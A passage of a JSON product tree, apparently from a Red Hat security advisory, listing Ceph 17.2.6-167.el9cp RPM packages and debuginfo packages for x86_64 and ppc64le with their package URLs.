"name": "ceph-immutable-object-cache-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-immutable-object-cache-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-immutable-object-cache@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-selinux-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-selinux-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-selinux-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-selinux@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "libcephfs-devel-2:17.2.6-167.el9cp.x86_64", "product": { "name": "libcephfs-devel-2:17.2.6-167.el9cp.x86_64", "product_id": "libcephfs-devel-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/libcephfs-devel@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "libcephfs2-2:17.2.6-167.el9cp.x86_64", "product": { "name": "libcephfs2-2:17.2.6-167.el9cp.x86_64", "product_id": "libcephfs2-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/libcephfs2@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "librados-devel-2:17.2.6-167.el9cp.x86_64", "product": { "name": "librados-devel-2:17.2.6-167.el9cp.x86_64", "product_id": "librados-devel-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/librados-devel@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "librados2-2:17.2.6-167.el9cp.x86_64", "product": { "name": "librados2-2:17.2.6-167.el9cp.x86_64", "product_id": "librados2-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/librados2@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "libradospp-devel-2:17.2.6-167.el9cp.x86_64", "product": { "name": "libradospp-devel-2:17.2.6-167.el9cp.x86_64", "product_id": "libradospp-devel-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/libradospp-devel@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "libradosstriper1-2:17.2.6-167.el9cp.x86_64", "product": { "name": "libradosstriper1-2:17.2.6-167.el9cp.x86_64", "product_id": "libradosstriper1-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/libradosstriper1@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "librbd-devel-2:17.2.6-167.el9cp.x86_64", "product": { "name": "librbd-devel-2:17.2.6-167.el9cp.x86_64", "product_id": "librbd-devel-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/librbd-devel@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "librbd1-2:17.2.6-167.el9cp.x86_64", "product": { "name": "librbd1-2:17.2.6-167.el9cp.x86_64", "product_id": "librbd1-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/librbd1@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "librgw-devel-2:17.2.6-167.el9cp.x86_64", "product": { "name": "librgw-devel-2:17.2.6-167.el9cp.x86_64", "product_id": "librgw-devel-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/librgw-devel@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "librgw2-2:17.2.6-167.el9cp.x86_64", "product": { "name": "librgw2-2:17.2.6-167.el9cp.x86_64", "product_id": "librgw2-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/librgw2@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-ceph-argparse-2:17.2.6-167.el9cp.x86_64", "product": { "name": "python3-ceph-argparse-2:17.2.6-167.el9cp.x86_64", "product_id": "python3-ceph-argparse-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-ceph-argparse@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-ceph-common-2:17.2.6-167.el9cp.x86_64", "product": { "name": "python3-ceph-common-2:17.2.6-167.el9cp.x86_64", "product_id": "python3-ceph-common-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-ceph-common@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-cephfs-2:17.2.6-167.el9cp.x86_64", "product": { "name": "python3-cephfs-2:17.2.6-167.el9cp.x86_64", "product_id": "python3-cephfs-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-cephfs@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rados-2:17.2.6-167.el9cp.x86_64", "product": { "name": "python3-rados-2:17.2.6-167.el9cp.x86_64", "product_id": "python3-rados-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rados@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rbd-2:17.2.6-167.el9cp.x86_64", "product": { "name": "python3-rbd-2:17.2.6-167.el9cp.x86_64", "product_id": "python3-rbd-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rbd@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rgw-2:17.2.6-167.el9cp.x86_64", "product": { "name": "python3-rgw-2:17.2.6-167.el9cp.x86_64", "product_id": "python3-rgw-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rgw@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "rbd-nbd-2:17.2.6-167.el9cp.x86_64", "product": { "name": "rbd-nbd-2:17.2.6-167.el9cp.x86_64", "product_id": "rbd-nbd-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rbd-nbd@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-debugsource-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-debugsource-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-debugsource-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-debugsource@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-base-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-base-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-base-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-base-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-common-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-common-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-common-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-common-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-exporter-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-exporter-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-exporter-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-exporter-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-fuse-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-immutable-object-cache-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-mds-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-mds-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-mds-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-mds-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-mgr-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-mgr-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-mgr-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-mgr-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-mon-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-mon-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-mon-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-mon-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-osd-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-osd-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-osd-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-osd-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-radosgw-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-test-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-test-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-test-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-test-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/cephfs-mirror-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "libcephfs2-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "libcephfs2-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "libcephfs2-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/libcephfs2-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "libcephsqlite-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "libcephsqlite-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "libcephsqlite-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/libcephsqlite-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "librados-devel-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "librados-devel-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "librados-devel-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/librados-devel-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "librados2-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "librados2-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "librados2-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/librados2-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "libradosstriper1-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "libradosstriper1-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "libradosstriper1-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/libradosstriper1-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "librbd1-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "librbd1-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "librbd1-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/librbd1-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "librgw2-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "librgw2-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "librgw2-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/librgw2-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-cephfs-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "python3-cephfs-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "python3-cephfs-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-cephfs-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rados-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "python3-rados-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "python3-rados-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rados-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rbd-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "python3-rbd-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "python3-rbd-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rbd-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "python3-rgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "python3-rgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rgw-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "rbd-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "rbd-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "rbd-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rbd-fuse-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "rbd-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "rbd-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "rbd-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rbd-mirror-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "rbd-nbd-debuginfo-2:17.2.6-167.el9cp.x86_64", "product": { "name": "rbd-nbd-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_id": "rbd-nbd-debuginfo-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rbd-nbd-debuginfo@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_version", "name": "ceph-base-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-base-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-base-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-base@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-common-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-common-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-common-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-common@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-fuse-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-fuse-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-fuse-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-fuse@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-immutable-object-cache-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-immutable-object-cache-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-immutable-object-cache-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-immutable-object-cache@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-selinux-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-selinux-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-selinux-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-selinux@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "libcephfs-devel-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "libcephfs-devel-2:17.2.6-167.el9cp.ppc64le", "product_id": "libcephfs-devel-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/libcephfs-devel@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "libcephfs2-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "libcephfs2-2:17.2.6-167.el9cp.ppc64le", "product_id": "libcephfs2-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/libcephfs2@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "librados-devel-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "librados-devel-2:17.2.6-167.el9cp.ppc64le", "product_id": "librados-devel-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/librados-devel@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "librados2-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "librados2-2:17.2.6-167.el9cp.ppc64le", "product_id": "librados2-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/librados2@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "libradospp-devel-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "libradospp-devel-2:17.2.6-167.el9cp.ppc64le", "product_id": "libradospp-devel-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/libradospp-devel@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "libradosstriper1-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "libradosstriper1-2:17.2.6-167.el9cp.ppc64le", "product_id": "libradosstriper1-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/libradosstriper1@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "librbd-devel-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "librbd-devel-2:17.2.6-167.el9cp.ppc64le", "product_id": "librbd-devel-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/librbd-devel@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "librbd1-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "librbd1-2:17.2.6-167.el9cp.ppc64le", "product_id": "librbd1-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/librbd1@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "librgw-devel-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "librgw-devel-2:17.2.6-167.el9cp.ppc64le", "product_id": "librgw-devel-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/librgw-devel@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "librgw2-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "librgw2-2:17.2.6-167.el9cp.ppc64le", "product_id": "librgw2-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/librgw2@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-ceph-argparse-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "python3-ceph-argparse-2:17.2.6-167.el9cp.ppc64le", "product_id": "python3-ceph-argparse-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-ceph-argparse@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-ceph-common-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "python3-ceph-common-2:17.2.6-167.el9cp.ppc64le", "product_id": "python3-ceph-common-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-ceph-common@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-cephfs-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "python3-cephfs-2:17.2.6-167.el9cp.ppc64le", "product_id": "python3-cephfs-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-cephfs@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rados-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "python3-rados-2:17.2.6-167.el9cp.ppc64le", "product_id": "python3-rados-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rados@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rbd-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "python3-rbd-2:17.2.6-167.el9cp.ppc64le", "product_id": "python3-rbd-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rbd@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rgw-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "python3-rgw-2:17.2.6-167.el9cp.ppc64le", "product_id": "python3-rgw-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rgw@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "rbd-nbd-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "rbd-nbd-2:17.2.6-167.el9cp.ppc64le", "product_id": "rbd-nbd-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rbd-nbd@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-debugsource-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-debugsource-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-debugsource-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-debugsource@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-base-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-base-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-base-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-base-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-common-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-common-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-common-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-common-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-exporter-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-exporter-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-exporter-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-exporter-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-fuse-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-immutable-object-cache-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-mds-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-mds-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-mds-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-mds-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-mgr-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-mgr-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-mgr-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-mgr-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-mon-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-mon-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-mon-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-mon-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { 